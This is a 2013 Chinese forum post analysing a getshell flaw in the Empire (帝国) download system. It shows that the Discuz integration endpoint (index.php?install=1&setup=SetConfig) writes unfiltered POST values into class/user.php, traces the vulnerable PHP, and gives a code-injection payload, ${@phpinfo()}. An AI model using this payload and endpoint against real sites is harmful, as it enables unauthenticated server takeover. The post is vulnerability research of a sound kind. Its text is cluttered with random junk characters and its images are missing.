这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
, ?9 q: q7 e; v, p7 Z k- e2 W+ ?4 p0 w3 [1 W- W4 |
3 l% y1 w# S& d7 V- U0 N这是帝国的一套下载系统 如图2 l" M. I+ M8 S( g7 [ F ?% ^0 Z
ps(不需要任何账户和密码,直接写shell)
* u' G, l: c) ]! D& g+ A
由于很多站是由于下载要整合discuz 等等一些论坛....- D% ?# S! f% u; X
/ p0 E$ I0 E1 ]; S
而帝国他又有一个万能接口,如图 9 g" v' z# j6 Q2 m
4 O9 q& b1 m, U
+ b+ `+ s3 C/ [: ?0 Y5 ]而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码- L9 [) T+ v# g( Y1 J% d
! A0 E) B0 p1 U
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
5 ]( S- @: }( a, W
: T6 `+ G* M, N在data/fun.php中的15行* k9 \6 |$ o7 F$ P6 Y x! L
; a& v2 d: ?8 @* @
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
) ]6 ]/ N7 \! k9 y3 `7 I17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
3 m1 g) t3 D+ h* `+ d, X
0 _; m& M5 h% c7 W C s这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
. w+ u9 F1 W# c T. x6 E% o! h f9 Q0 y
他将传进来的变量进行了切割,然后赋给了$filetext3 y0 y" w7 S) t5 b/ R7 ^1 ~# Z! o
+ V4 N9 ?) [- T( ^9 U. l/ { n然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了7 Y6 v5 z9 r6 s' x& i5 ~
, w+ A1 a9 R) O6 u# y我们看看写入的结果,随便填一个 4 }# D& z m e6 t0 r& }
( a$ u& ?$ w @* `, B
8 g( r2 r% p, |, Z/ S* ^, L
3 F* c; B; c, i9 Z9 M% x- f) Q4 Z& J
* c. d/ z: p0 V: }+ } w9 w
, b( w7 r9 O. Z" R% \& ?- d
: n& K- M4 {1 \0 Q: x3 P5 O
1 e; F+ E+ S6 l3 M* r8 x2 L& s' y9 t, b& S3 Q# g- ~
* ]% v0 e0 b1 `9 o
$ Y2 L5 S" _' b
$ w- o% r8 }6 J, {8 O) u
5 J' y, D6 P* G% P3 X& ~' w! L; @- A7 L8 ~$ c6 h R
/ j$ J6 J3 B; W' s" J
6 D# P+ E! f2 t# M
|- m6 X% Q% e
" M4 I# N: R9 a v1 z
/ G1 @8 t# a* g' e, O, F; n A z* Q2 a
$ |5 y4 h# W4 N) }9 i) l- V
# M0 @7 g) d% T7 P, }) U所以我们淫荡点,写个${@phpinfo()}试试 ) k g# Z/ f" G3 G' C' k
然后访问以下class/user.php这个文件
/ U r1 N& g* l+ @+ [, O日了吧 " S! G3 d4 d; a6 A, J
& W+ F& m' r: _( L6 @8 H
9 r7 A" ?! S+ ~4 V. A0 I+ y/ Y C: F
# A e; l: M+ Q
4 {/ ?6 X$ E. m* S, b4 z5 Y+ P5 ?. i) F
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对